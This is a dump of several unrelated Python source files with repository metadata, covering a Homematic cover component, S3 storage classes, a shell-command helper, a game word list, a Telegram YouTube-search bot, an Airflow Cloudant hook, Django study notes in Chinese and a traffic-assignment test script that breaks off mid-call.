    # renamed so the platform config stays accessible.
    for device_config in discovery_info[ATTR_DISCOVER_DEVICES]:
        new_device = HMCover(hass, device_config)
        new_device.link_homematic()
        devices.append(new_device)

    add_devices(devices)
class HMCover(HMDevice, CoverDevice):
    """Representation a Homematic Cover."""
    @property
    def current_cover_position(self):
        """
        Return current position of cover.
        None is unknown, 0 is closed, 100 is fully open.
        """
        # NOTE(review): assumes _hm_get_state() returns a float in [0, 1];
        # a None state would raise TypeError here -- confirm upstream.
        return int(self._hm_get_state() * 100)
    def set_cover_position(self, **kwargs):
        """Move the cover to a specific position."""
        if ATTR_POSITION in kwargs:
            # Clamp to [0, 100], then convert to the device's 0.0-1.0 scale.
            position = float(kwargs[ATTR_POSITION])
            position = min(100, max(0, position))
            level = position / 100.0
            self._hmdevice.set_level(level, self._channel)
    @property
    def is_closed(self):
        """Return if the cover is closed."""
        # Implicitly returns None (unknown) when the position is None.
        if self.current_cover_position is not None:
            if self.current_cover_position > 0:
                return False
            else:
                return True
    def open_cover(self, **kwargs):
        """Open the cover."""
        self._hmdevice.move_up(self._channel)
    def close_cover(self, **kwargs):
        """Close the cover."""
        self._hmdevice.move_down(self._channel)
    def stop_cover(self, **kwargs):
        """Stop the device if in motion."""
        self._hmdevice.stop(self._channel)
    def _init_data_struct(self):
        """Generate a data dict (self._data) from hm metadata."""
        # Add state to data dict
        self._state = "LEVEL"
        self._data.update({self._state: STATE_UNKNOWN})
| 29.636364 | 78 | 0.653374 |
ace08f61bc076f5ea4774b0380661f6a5449ff7d | 193 | py | Python | wsgi/iportalen_django/iportalen/storage.py | I-sektionen/i-portalen | 1713e5814d40c0da1bf3278d60a561e7d3df3550 | [
"MIT"
] | 4 | 2016-09-21T17:06:01.000Z | 2018-02-06T16:36:44.000Z | wsgi/iportalen_django/iportalen/storage.py | I-sektionen/i-portalen | 1713e5814d40c0da1bf3278d60a561e7d3df3550 | [
"MIT"
] | 149 | 2016-03-07T23:50:47.000Z | 2022-03-11T23:16:33.000Z | wsgi/iportalen_django/iportalen/storage.py | I-sektionen/i-portalen | 1713e5814d40c0da1bf3278d60a561e7d3df3550 | [
"MIT"
] | 1 | 2016-03-07T23:02:06.000Z | 2016-03-07T23:02:06.000Z | from storages.backends.s3boto import S3BotoStorage
class StaticRootS3BotoStorage(S3BotoStorage):
    """S3 backend storing collected static files under the 'static/' prefix."""
    location = 'static'
class MediaRootS3BotoStorage(S3BotoStorage):
    """S3 backend for uploaded media, stored under the 'client/' prefix."""
    location = 'client'
| 21.444444 | 50 | 0.797927 |
ace08fd34aaf9a4a05dc7a45354f52e19aef1108 | 648 | py | Python | actions/scripts/common_mydemo.py | gkzz/mydemo_pack | 1accb8a270a6c08ac598da81522648e4cfb1abc1 | [
"MIT"
] | null | null | null | actions/scripts/common_mydemo.py | gkzz/mydemo_pack | 1accb8a270a6c08ac598da81522648e4cfb1abc1 | [
"MIT"
] | null | null | null | actions/scripts/common_mydemo.py | gkzz/mydemo_pack | 1accb8a270a6c08ac598da81522648e4cfb1abc1 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import traceback
from subprocess import Popen, PIPE
class Common:
    """ Common for mydemo """

    def __init__(self):
        pass

    def execute_command(self, command):
        """Run ``command`` through the shell and capture its output.

        SECURITY NOTE(review): shell=True executes the string via the
        shell; never pass untrusted input here.

        :returns: (success, stdout_lines, stderr) -- on success, stdout and
                  stderr are lists of (byte) lines; on failure, stdout is
                  None and stderr is the formatted traceback string
                  (original return contract preserved).
        """
        # FIX: renamed from ``bool`` -- the original shadowed the builtin.
        success = False
        try:
            stdout, stderr = Popen(
                command, shell=True, stdout=PIPE, stderr=PIPE
            ).communicate()
            stdout = stdout.splitlines()
            stderr = stderr.splitlines()
            success = True
        # FIX: was a bare ``except:`` which also swallowed SystemExit
        # and KeyboardInterrupt.
        except Exception:
            stdout = None
            stderr = traceback.format_exc()
        return success, stdout, stderr
ace09069f8b7d6584004284e12f3de550eb27104 | 7,611 | py | Python | sockets/words.py | JesperKauppinen/paint-webapp | 772ac2b071c3cb1a984673c2f55f1de8d7692d2f | [
"MIT"
] | null | null | null | sockets/words.py | JesperKauppinen/paint-webapp | 772ac2b071c3cb1a984673c2f55f1de8d7692d2f | [
"MIT"
] | 4 | 2021-11-27T04:02:58.000Z | 2021-12-02T16:43:07.000Z | sockets/words.py | JesperKauppinen/paint-webapp | 772ac2b071c3cb1a984673c2f55f1de8d7692d2f | [
"MIT"
] | null | null | null | from random import choice
nouns = [
'people',
'history',
'way',
'art',
'world',
'information',
'map',
'two',
'family',
'government',
'health',
'system',
'computer',
'meat',
'year',
'thanks',
'music',
'person',
'reading',
'method',
'data',
'food',
'understanding',
'theory',
'law',
'bird',
'literature',
'problem',
'software',
'control',
'knowledge',
'power',
'ability',
'economics',
'love',
'internet',
'television',
'science',
'library',
'nature',
'fact',
'product',
'idea',
'temperature',
'investment',
'area',
'society',
'activity',
'story',
'industry',
'media',
'thing',
'oven',
'community',
'definition',
'safety',
'quality',
'development',
'language',
'management',
'player',
'variety',
'video',
'week',
'security',
'country',
'exam',
'movie',
'organization',
'equipment',
'physics',
'analysis',
'policy',
'series',
'thought',
'basis',
'boyfriend',
'direction',
'strategy',
'technology',
'army',
'camera',
'freedom',
'paper',
'environment',
'child',
'instance',
'month',
'truth',
'marketing',
'university',
'writing',
'article',
'department',
'difference',
'goal',
'news',
'audience',
'fishing',
'growth',
'income',
'marriage',
'user',
'combination',
'failure',
'meaning',
'medicine',
'philosophy',
'teacher',
'communication',
'night',
'chemistry',
'disease',
'disk',
'energy',
'nation',
'road',
'role',
'soup',
'advertising',
'location',
'success',
'addition',
'apartment',
'education',
'math',
'moment',
'painting',
'politics',
'attention',
'decision',
'event',
'property',
'shopping',
'student',
'wood',
'competition',
'distribution',
'entertainment',
'office',
'population',
'president',
'unit',
'category',
'cigarette',
'context',
'introduction',
'opportunity',
'performance',
'driver',
'flight',
'length',
'magazine',
'newspaper',
'relationship',
'teaching',
'cell',
'dealer',
'debate',
'finding',
'lake',
'member',
'message',
'phone',
'scene',
'appearance',
'association',
'concept',
'customer',
'death',
'discussion',
'housing',
'inflation',
'insurance',
'mood',
'woman',
'advice',
'blood',
'effort',
'expression',
'importance',
'opinion',
'payment',
'reality',
'responsibility',
'situation',
'skill',
'statement',
'wealth',
'application',
'city',
'county',
'depth',
'estate',
'foundation',
'grandmother',
'heart',
'perspective',
'photo',
'recipe',
'studio',
'topic',
'collection',
'depression',
'imagination',
'passion',
'percentage',
'resource',
'setting',
'ad',
'agency',
'college',
'connection',
'criticism',
'debt',
'description',
'memory',
'patience',
'secretary',
'solution',
'administration',
'aspect',
'attitude',
'director',
'personality',
'psychology',
'recommendation',
'response',
'selection',
'storage',
'version',
'alcohol',
'argument',
'complaint',
'contract',
'emphasis',
'highway',
'loss',
'membership',
'possession',
'preparation',
'steak',
'union',
'agreement',
'cancer',
'currency',
'employment',
'engineering',
'entry',
'interaction',
'limit',
'mixture',
'preference',
'region',
'republic',
'seat',
'tradition',
'virus',
'actor',
'classroom',
'delivery',
'device',
'difficulty',
'drama',
'election',
'engine',
'football',
'guidance',
'hotel',
'match',
'owner',
'priority',
'protection',
'suggestion',
'tension',
'variation',
'anxiety',
'atmosphere',
'awareness',
'bread',
'climate',
'comparison',
'confusion',
'construction',
'elevator',
'emotion',
'employee',
'employer',
'guest',
'height',
'leadership',
'mall',
'manager',
'operation',
'recording',
'respect',
'sample',
'transportation',
'boring',
'charity',
'cousin',
'disaster',
'editor',
'efficiency',
'excitement',
'extent',
'feedback',
'guitar',
'homework',
'leader',
'mom',
'outcome',
'permission',
'presentation',
'promotion',
'reflection',
'refrigerator',
'resolution',
'revenue',
'session',
'singer',
'tennis',
'basket',
'bonus',
'cabinet',
'childhood',
'church',
'clothes',
'coffee',
'dinner',
'drawing',
'hair',
'hearing',
'initiative',
'judgment',
'lab',
'measurement',
'mode',
'mud',
'orange',
'poetry',
'police',
'possibility',
'procedure',
'queen',
'ratio',
'relation',
'restaurant',
'satisfaction',
'sector',
'signature',
'significance',
'song',
'tooth',
'town',
'vehicle',
'volume',
'wife',
'accident',
'airport',
'appointment',
'arrival',
'assumption',
'baseball',
'chapter',
'committee',
'conversation',
'database',
'enthusiasm',
'error',
'explanation',
'farmer',
'gate',
'girl',
'hall',
'historian',
'hospital',
'injury',
'instruction',
'maintenance',
'manufacturer',
'meal',
'perception',
'pie',
'poem',
'presence',
'proposal',
'reception',
'replacement',
'revolution',
'river',
'son',
'speech',
'tea',
'village',
'warning',
'winner',
'worker',
'writer',
'assistance',
'breath',
'buyer',
'chest',
'chocolate',
'conclusion',
'contribution',
'cookie',
'courage',
'dad',
'desk',
'drawer',
'establishment',
'examination',
'garbage',
'grocery',
'honey',
'impression',
'improvement',
'independence',
'insect',
'inspection',
'inspector',
'king',
'ladder',
'menu',
'penalty',
'piano',
'potato',
'profession',
'professor',
'quantity',
'reaction',
'requirement',
'salad',
'sister',
'supermarket',
'tongue',
'weakness',
'wedding',
'affair',
'ambition',
'analyst',
'apple',
'assignment',
'assistant',
'bathroom',
'bedroom',
'beer',
'birthday',
'celebration',
'championship',
'cheek',
'client',
'consequence',
'departure',
'diamond',
'dirt',
'ear',
'fortune',
'friendship',
'funeral',
'gene',
'girlfriend',
'hat',
'indication',
'intention',
'lady',
'midnight',
'negotiation',
'obligation',
'passenger',
'pizza',
'platform',
'poet',
'pollution',
'recognition',
'reputation',
'shirt',
'sir',
'speaker',
'stranger',
'surgery',
'sympathy',
'tale',
'throat',
'trainer',
'uncle',
'youth',
'time',
'work',
]
def get_variant() -> str:
    """Return one noun chosen uniformly at random from ``nouns``."""
    return choice(nouns)
| 15.252505 | 25 | 0.480883 |
ace090c496b19c86dec7e95bc758da1e135d2664 | 1,206 | py | Python | safebrowsing/base.py | Lcforself/safebrowsing-python | d92143496abc17703a936b04a87e95fdfc302405 | [
"MIT"
] | null | null | null | safebrowsing/base.py | Lcforself/safebrowsing-python | d92143496abc17703a936b04a87e95fdfc302405 | [
"MIT"
] | null | null | null | safebrowsing/base.py | Lcforself/safebrowsing-python | d92143496abc17703a936b04a87e95fdfc302405 | [
"MIT"
] | null | null | null | from platform import node
import conf
class BaseDbObj(object):
    """Abstract safebrowsing DB backend; concrete backends implement the hooks.

    Connection settings are read from ``conf`` once, at class-definition
    time (including the ``node()`` hostname fallback for the DB host).
    """
    db_engine = getattr(conf, 'DATABASE_ENGINE')
    db_name = getattr(conf, 'DATABASE_NAME')
    db_user = getattr(conf, 'DATABASE_USER')
    db_password = getattr(conf, 'DATABASE_PASSWORD')
    # Falls back to the local hostname when DATABASE_HOST is unset.
    db_host = getattr(conf, 'DATABASE_HOST', node())
    db_port = getattr(conf, 'DATABASE_PORT')
    api_key = getattr(conf, 'API_KEY')

    # BUG FIX (all methods below): the original *returned* the
    # NotImplementedError class instead of raising it, so calling an
    # unimplemented backend method silently "succeeded".

    def get_version(self, badware_type):
        """To be subclassed by backends."""
        raise NotImplementedError

    def insert_version_row(self, badware_type, version_number):
        """To be subclassed by backends."""
        raise NotImplementedError

    def update_version_row(self, badware_type, new_version_number, version_number):
        """To be subclassed by backends."""
        raise NotImplementedError

    def insert_rows(self, url_hash_dict):
        """To be subclassed by backends."""
        raise NotImplementedError

    def delete_rows(self, url_hash_dict):
        """To be subclassed by backends."""
        raise NotImplementedError

    def lookup_by_md5(self, md5_hash_list):
        """To be subclassed by backends."""
        raise NotImplementedError
| 33.5 | 83 | 0.678275 |
ace0920e896e1a796a260037406f21581ac8ee2d | 628 | py | Python | fdk_client/platform/models/CreateAutocompleteKeyword.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/platform/models/CreateAutocompleteKeyword.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/platform/models/CreateAutocompleteKeyword.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | """Platform Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
from .AutocompleteResult import AutocompleteResult
class CreateAutocompleteKeyword(BaseSchema):
    """Marshmallow schema for creating an autocomplete keyword entry."""
    # Catalog swagger.json
    app_id = fields.Str(required=False)
    results = fields.List(fields.Nested(AutocompleteResult, required=False), required=False)
    is_active = fields.Boolean(required=False)
    _custom_json = fields.Dict(required=False)
    words = fields.List(fields.Str(required=False), required=False)
| 18.470588 | 92 | 0.727707 |
ace09384bcff954fc54bfdc8ea3f28487391272b | 1,589 | py | Python | search.py | MuhammadaliPassDev/Searcher | 883069a0b14d0ac493aa9402914dcf528afed7c0 | [
"Apache-2.0"
] | 1 | 2022-02-07T07:02:58.000Z | 2022-02-07T07:02:58.000Z | search.py | MuhammadaliPassDev/Searcher | 883069a0b14d0ac493aa9402914dcf528afed7c0 | [
"Apache-2.0"
] | null | null | null | search.py | MuhammadaliPassDev/Searcher | 883069a0b14d0ac493aa9402914dcf528afed7c0 | [
"Apache-2.0"
] | null | null | null | from youtube_search import YoutubeSearch as YS
from config import TOKEN
from aiogram import Bot,types,Dispatcher,utils
from aiogram.utils import executor
from aiogram.types import InputTextMessageContent,InlineQueryResultArticle, ReplyKeyboardMarkup,KeyboardButton
import hashlib
async def on_startup(_):
    # Dispatcher startup hook: just announce that polling has begun.
    print("Bot is online.")
def searcher(text):
    """Return up to 20 YouTube search results for ``text`` as dicts."""
    return YS(text, max_results=20).to_dict()
# Single bot instance and its long-polling dispatcher.
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(commands=["start"])
async def send_welcome(message: types.Message):
    # /start handler: greet the user by username.
    username = message.from_user.username
    #b1 = KeyboardButton("@ytlook_bot ")
    #main = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True).add(b1)
    await bot.send_message(message.from_user.id,f"Hi {username}")#, reply_markup=main
@dp.inline_handler()
async def inline_handler(query: types.InlineQuery):
    # Fall back to a generic query while the user hasn't typed anything yet.
    text = query.query or "video"
    links = searcher(text)
    # One inline article per result; result ids must be unique, so hash the
    # video id (md5 here is an identifier, not a security measure).
    articles = [types.InlineQueryResultArticle(
        id = hashlib.md5(f'{link["id"]}'.encode()).hexdigest(),
        title = f'{link["title"]}',
        url = f'https://www.youtube.com/watch?v={link["id"]}',
        thumb_url = f'{link["thumbnails"][0]}',
        input_message_content=types.InputTextMessageContent(
            message_text=f'via @YTlook_BOT\nhttps://www.youtube.com/watch?v={link["id"]}')
    ) for link in links]
    # Cache answers per-user for 60 seconds.
    await query.answer(articles,cache_time=60,is_personal=True)
if __name__ == "__main__":
executor.start_polling(dp,skip_updates=True,on_startup=on_startup) | 34.543478 | 111 | 0.702329 |
ace09452e318642433074309a13e81d3ebebef24 | 3,973 | py | Python | buyfree_mall/buyfree_mall/apps/users/tests.py | GalphaXie/E-commerce | e358089c8002739b121cf7ced7d27b093303de94 | [
"MIT"
] | null | null | null | buyfree_mall/buyfree_mall/apps/users/tests.py | GalphaXie/E-commerce | e358089c8002739b121cf7ced7d27b093303de94 | [
"MIT"
] | null | null | null | buyfree_mall/buyfree_mall/apps/users/tests.py | GalphaXie/E-commerce | e358089c8002739b121cf7ced7d27b093303de94 | [
"MIT"
] | null | null | null | from django.test import TestCase
# Create your tests here.
'''
pycharm 快捷键 ctrl shift - | ctrl shift + 快速折叠或者展开类(函数) 阅读源码有奇效
--------------------------------------------------
实现功能:
1.email & 激活状态 -> user模型自带email,但是激活状态不能用is_active,所以添加字段,数据库迁移
2.GET ; url路径: /users/<user_id>/ -> 但是标记的是token而不是id, 所以 /user/ 复数变单数
3. request: username mobile email email_active
4. response : id username mobile email email_active
难点:视图的理解:
查寻数据 -> 序列化数据 => retrieve -> RetrieveAPIView(RetrieveModelMixin, GenericAPIView)
(继承的时候,子类不存在的方法需要调用父类的,如果父类中在该方法中又调用了另外一个方法,而这个方法在父类和子类中都有,那么会优先调用子类的,从而达到重写的目的.这种只是更加复杂一点重写而已.)
序列化器:
class
访问view视图详情的时候, 为什么要重写 get_object方法? 返回当前的用户对象?
queryset (retrieve 对其进行过滤,才会只有一个结果返回) 其默认依赖实现是: /users/<pk>/ 这两者都没有实现 => 重写 get_object
返回数据,获得验证过的当前的用户,而这个在当前请求的 user 属性. request.user (不能直接拿到)
要在 类视图对象中,可以通过类视图对象获取属性request. (视频中老师源码看错误,应该看 APIView的dispatch方法的 self.request= request)
serializer_class = ?
为何要增加认证?
必须登录认证之后才能访问 get_object 方法
前端实现: jwt 规范的做法:请求头中实现
记住登录: localStorage ; 否则是 SessionStorage
token: 没有权限 status:403;或 过期
str.split() -> 列表,默认是以空格分割 JWT空格str
获取token值来判断用户身份的方式:
1.前端传递了token值; 2.我们在在配置中配置了 DEFAULT_AUTHENTICATION_CLASSES
----------------------------------------------------
PUT /users/<user_id>/email -> email
发送邮件的前置准备工作
SMTP 是发送邮件的服务器 vs IMAP POP3 是收邮件的服务器(其中IMAP支持交互操作,双向保存等,POP3只支持下载保存)
port 25
授权码
Django 发送邮件 : 1.配置(现成的模块);2.发送(django.core.mail 的 send_mail方法)
celery 发送操作
celery依赖django的配置,不要忽略
send_mail(subject, message, from_email, recipient_list,html_message=None) 参数:
链接: (token) 需要进行处理,防止用户激活的时候修改 激活链接
给 django自带的User模型类中仿照自带的一些方法,添加一个自定义的方法
自定义方法是添加token的方法,没太懂?
generate_verify_email_url 和 check_verify_email_token 这种对称的套路方法,都是是用 itsdangerous 包 TJWSSerializer
dumps. decode ; loads
序列化器的update方法中, save()的位置? 因为下面调用自定义方法的时候需要使用email,所以要先save
激活:
post or get 理解:
get没有请求体, delete可以有可以没有... 这里把token放在url?后面
--------------------------------------------------------
新版的django 的 ForeignKey(必须设置 on_delete 选项) 选项: related_name 类似flask的backref
自关联要点:
- 外键 'self' ; 这里其实可以写字符串或者类名(如果不是在同一py文件,那么要把app名加上:app名.类名); 但是'解释性'语言,所以可能会出错;通用的方法是; 都写字符串
- relate_name 多个外键,就可能存在问题
数据库迁移:
apps 新建的必须要注册到 dev的配置文件中,否则是没法进行数据库迁移的.
导入数据库文件方式--测试脚本实现:
1. <
2. # !
命令:mysql -h数据库ip地址 -u数据库用户名 -p 数据库名 < areas.sql 老师的课件是错误的
mysql -h127.0.0.1 --port=3306 -ubuyfree -p buyfree_mall < areas.sql (mysql数据库端口命令可以省略)
修改文件的执行权限 chmod +x import_areas_data_to_db.sh
执行命令导入数据: ./import_areas_data_to_db.sh
-------------------------------------------------------
实现省市区的接口:
所在地区:两个接口, 省是一打开就加载; 后面的市区可以共用一个接口
subs 属性,多
视图集: 视图方法的集合
视图集用: router方法来注册. DefaultRouter类() -> router -> router.register(prefix, viewset, verbose_name) -> urlpatterns += router.urls
缓存:
关闭分页处理: None
继承的顺序, Mixin 都写到前面 (强制记住)
------------------------------------------------------------
用户地址管理
分析: 用户地址数量不定(<=20) -> 不能放在 user 模型一起 -> 新建一个表
默认地址 -> 两种方法: 第一种-在address表中标记为default_address=True,修改麻烦,且容易造成一个用户有多个默认地址; 采取第二种-用户表中增加一个字段指向address
可以在 class Meta中设置 ordering = ['-update_time'] 来指明 每次查询的默认排序方式
关于视图集使用-- 解决现实问题: 地址栏有6个接口,分别用了各种methods,且他们的url资源都是关于 /addresses/ 的
get 查询 /addresses/ (/addresses/<pk>/ 不查询)
post 增加 /addresses/ (糊涂,增加这里哪有 <pk>, 这个id是数据库自动生成的,是不是傻 但是这里为何用复数呢?)
put 修改 /addresses/<pk>/
delete 删除 /addresses/<pk>/
put 设置默认地址 /addresses/<pk>/status/ (/users/<user_id>/addresses/<pk>/status/ 改成django风格,用户登录之后才会能修改,所以把前面去掉,为了统一到一个视图集中该操作)
put 设置地址的标题 /addresses/<pk>/title/
# url资源统一之后 符合 rest 风格, 才能更好的调用 视图集; 这个可以通过前面又一次不符合规范而没用的那个视图来验证
***********************************************
# 这里面导入的是 GenericViewSet, 而不是 GenericAPIView
这里如何理解? 并不容易
为何要继承 UpdateModelMixin ? 只是使用了它的校验? 它们映射 了 methods -> action
到底如何选择个性化字段?
映射到 对应的模型类 还要结合数据库表的字段
python manage.py shell 如何使用? 导包出现问题...
***********************************************
补充重要知识点:
关于外键字段: 一个外键字段,Django自动让其包含两个值: 模型类名.字段名 => 字段对象; 模型名.字段名_id => 字段对象的id(django 自动补充的); 这个两个结果在 查询和创建 的时候都会产生
'''
| 26.66443 | 129 | 0.699471 |
ace0953c452f5375b36724f211c92d9a86151c9b | 2,442 | py | Python | airflow/providers/cloudant/hooks/cloudant.py | mebelousov/airflow | d99833c9b5be9eafc0c7851343ee86b6c20aed40 | [
"Apache-2.0"
] | 3 | 2015-08-25T13:56:44.000Z | 2020-03-21T10:26:58.000Z | airflow/providers/cloudant/hooks/cloudant.py | mebelousov/airflow | d99833c9b5be9eafc0c7851343ee86b6c20aed40 | [
"Apache-2.0"
] | 37 | 2020-07-21T07:50:02.000Z | 2022-03-29T22:31:28.000Z | airflow/providers/cloudant/hooks/cloudant.py | mebelousov/airflow | d99833c9b5be9eafc0c7851343ee86b6c20aed40 | [
"Apache-2.0"
] | 4 | 2020-07-17T14:02:28.000Z | 2022-02-23T04:29:58.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Hook for Cloudant"""
from cloudant import cloudant
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
class CloudantHook(BaseHook):
    """
    Interact with Cloudant. A thin wrapper around the ``cloudant`` python library.

    .. seealso:: the latest documentation `here <https://python-cloudant.readthedocs.io/en/latest/>`_.

    :param cloudant_conn_id: The connection id to authenticate and get a session object from cloudant.
    :type cloudant_conn_id: str
    """

    def __init__(self, cloudant_conn_id='cloudant_default'):
        super().__init__()
        self.cloudant_conn_id = cloudant_conn_id

    def get_conn(self):
        """
        Open a connection to the cloudant service; it closes automatically
        when used as a context manager.

        .. note::
            In the connection form:

            - 'host' equals the 'Account' (optional)
            - 'login' equals the 'Username (or API Key)' (required)
            - 'password' equals the 'Password' (required)

        :return: an authorized cloudant session context manager object.
        :rtype: cloudant
        """
        connection = self.get_connection(self.cloudant_conn_id)
        self._validate_connection(connection)
        return cloudant(user=connection.login, passwd=connection.password, account=connection.host)

    def _validate_connection(self, conn):
        # Both credentials are mandatory; fail fast with a clear message.
        for required in ('login', 'password'):
            if not getattr(conn, required):
                raise AirflowException('missing connection parameter {conn_param}'.format(
                    conn_param=required))
| 37.569231 | 106 | 0.703522 |
ace095a22bc87d26da05cdf764cf6765580cf88f | 5,956 | py | Python | test_scripts/MATLAB_test_weighted_sum.py | tapnx/tapnx | 5c1d21345ccd499939e35702526a4e2b7160ca4e | [
"MIT"
] | null | null | null | test_scripts/MATLAB_test_weighted_sum.py | tapnx/tapnx | 5c1d21345ccd499939e35702526a4e2b7160ca4e | [
"MIT"
] | null | null | null | test_scripts/MATLAB_test_weighted_sum.py | tapnx/tapnx | 5c1d21345ccd499939e35702526a4e2b7160ca4e | [
"MIT"
] | null | null | null | import pandas as pd
import tapnx as tapnx
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
def travel_time(x,c,d,m):
    """BPR-style link travel time: free-flow time (d/m) inflated by congestion."""
    free_flow = d / m
    congestion = 0.15 * (x / c) ** 4
    return free_flow * (1 + congestion)
def total_travel_time(x,c,d,m):
    """Total system travel time: sum over links of flow times link travel time."""
    per_link = x * travel_time(x, c, d, m)
    return np.sum(per_link)
def speed(x,c,d,m):
    """Congested link speed: free-flow speed m divided by the BPR congestion factor.

    Fix: removed the dead assignment ``a = d/m`` — the value was computed but
    never used in the return expression.
    """
    return m / (1 + 0.15 * (x / c) ** 4)
def fuel_consumption(x,c,d,m):
    """Per-vehicle fuel consumption as a quadratic function of congested speed."""
    s = speed(x, c, d, m)
    return 0.0019 * s ** 2 - 0.2784 * s + 17.337
def total_fuel_consumption(x,c,d,m):
    # Network fuel consumption: per-link flow times the per-vehicle fuel rate,
    # scaled by link length in hundreds of distance units (d/100).
    return np.sum((d/100)*x*fuel_consumption(x,c,d,m))
# ## system optimal
# def t(x,a,b,c,n,d,lam):
# return a*(1+b*(x/c)**n)
# def dtdx(x,a,b,c,n,d,lam):
# return a*b*n*(c**(-n))*(x**(n-1))
# def d2tdx2(x,a,b,c,n,d,lam):
# return (n-1)*a*b*n*(c**(-n))*(x**(n-2))
# def edge_func_so_np(x,a,b,c,n,d,lam):
# return t(x,a,b,c,n,d,lam) + x*dtdx(x,a,b,c,n,d,lam)
# def edge_func_so_derivative_np(x,a,b,c,n,d,lam):
# return 2*dtdx(x,a,b,c,n,d,lam) + x*d2tdx2(x,a,b,c,n,d,lam)
## distance system optimal
##
# need F = lam*D + lam*T
# D = d*x
# T = x*t(x)
# to solve via equilibrium use
# t_hat = F + x*F'
# F' = lam*D' + lam*T'
# = lam*d + lam*( t(x) + x*t'(x) )
# set max_d and max_tt to 1 for standard scale
# max_tt should be divided by the number of edges as the total travel time is a sum of all edges
# to maximise travel time, minimise -t, so lam = 0, max_tt =-1, results in a negative 1
def t(x,a,b,c,n,d,lam,max_d,max_tt):
    """Weighted-sum edge cost: lam-weighted scaled distance plus (1-lam)-weighted BPR travel time."""
    distance_term = (lam / max_d) * d
    time_term = ((1 - lam) / max_tt) * a * (1 + b * (x / c) ** n)
    return distance_term + time_term
def dtdx(x,a,b,c,n,d,lam,max_d,max_tt):
    """First derivative of the weighted edge cost w.r.t. flow x (the distance term is constant)."""
    scale = (1 - lam) / max_tt
    return scale * a * b * n * (c ** (-n)) * (x ** (n - 1))
def d2tdx2(x,a,b,c,n,d,lam,max_d,max_tt):
    """Second derivative of the weighted edge cost w.r.t. flow x."""
    scale = (1 - lam) / max_tt
    return scale * (n - 1) * a * b * n * (c ** (-n)) * (x ** (n - 2))
def edge_func_dist_np(x,a,b,c,n,d,lam,max_d,max_tt):
    # Marginal edge cost t(x) + x*t'(x); solving a user equilibrium with this
    # cost yields the system optimum of the weighted objective.
    return t(x,a,b,c,n,d,lam,max_d,max_tt) + x*dtdx(x,a,b,c,n,d,lam,max_d,max_tt)
def edge_func_dist_derivative_np(x,a,b,c,n,d,lam,max_d,max_tt):
    # d/dx of the marginal cost: d/dx [t + x*t'] = 2*t' + x*t''.
    return 2*dtdx(x,a,b,c,n,d,lam,max_d,max_tt) + x*d2tdx2(x,a,b,c,n,d,lam,max_d,max_tt)
filename = 'MATLAB_test'
# meta_data = tapnx.readTNTPMetadata('test_data/{}/{}_net.tntp'.format(filename,filename))
# df_edges = tapnx.TNTP_net_to_pandas('test_data/{}/{}_net.TNTP'.format(filename, filename), start_line=meta_data['END OF METADATA'])
#df_nodes = tapnx.TNTP_node_to_pandas('test_data/{}/{}_node.TNTP'.format(filename, filename))
# df_trips = tapnx.TNTP_trips_to_pandas('test_data/{}/{}_trips.TNTP'.format(filename, filename))
df_edges, df_nodes, df_trips = tapnx.graph_from_csv(
edges_filename = 'test_data/{}/{}_net.csv'.format(filename, filename),
trips_filename = 'test_data/{}/{}_trips.csv'.format(filename, filename)
)
G = tapnx.graph_from_edgedf(df_edges, edge_attr=True)
G = tapnx.trips_from_tripsdf(G, df_trips)
n = tapnx.get_np_array_from_edge_attribute(G, 'n')
b = tapnx.get_np_array_from_edge_attribute(G, 'b')
d = tapnx.get_np_array_from_edge_attribute(G, 'd')
#m = tapnx.get_np_array_from_edge_attribute(G, 'm')
c = tapnx.get_np_array_from_edge_attribute(G, 'c')
a = tapnx.get_np_array_from_edge_attribute(G, 'a')
#a = d/m
#print(a)
G.graph['no_edges'] = len(a)
G.graph['first_thru_node'] = 0
# G.graph['name'] = filename
# G.graph['no_zones'] = int(meta_data['NUMBER OF ZONES'])
# G.graph['no_nodes'] = int(meta_data['NUMBER OF NODES'])
# G.graph['first_thru_node'] = int(meta_data['FIRST THRU NODE'])
# G.graph['no_edges'] = int(meta_data['NUMBER OF LINKS'])
#G = tapnx.graph_positions_from_nodedf(G, df_nodes)
tol = 10**-6
max_iter = 100
#G, data = tapnx.gradient_projection(G,collect_data=True,aec_gap_tol=tol,max_iter=max_iter)
# plt.plot(data['AEC'], label='Gradient Projection 1')
# plt.plot(data['no_paths'], label='No. paths')
# #print(data_fw['x'][-1])
#print(data['x'][-1])
#print(np.sum(data['objective'][-1]))
# lam = 0
# G, data = tapnx.gradient_projection(
# G,
# collect_data=True,
# aec_gap_tol=tol,
# max_iter=max_iter)
# x = data['x'][-1]
#print(x)
#print(t(x,a,b,c,n,d,lam))
# print(np.sum(x*t(x,a,b,c,n,d,lam)))
#plt.figure()
#plt.plot(data['AEC'], label='Gradient Projection 1')
#plt.yscale('log')
lam = 0
max_tt = 1
max_d = 1
G, data = tapnx.gradient_projection(
G,
collect_data=True,
aec_gap_tol=tol,
max_iter=max_iter,
d=False,
lam=lam)
x = data['x'][-1]
#print(x)
#print(t(x,a,b,c,n,d,lam,max_d,max_tt))
UE = np.sum(x*t(x,a,b,c,n,d,lam,max_d,max_tt))
lam = 0
max_tt = 1
max_d = 1
G, data = tapnx.gradient_projection(
G,
collect_data=True,
aec_gap_tol=tol,
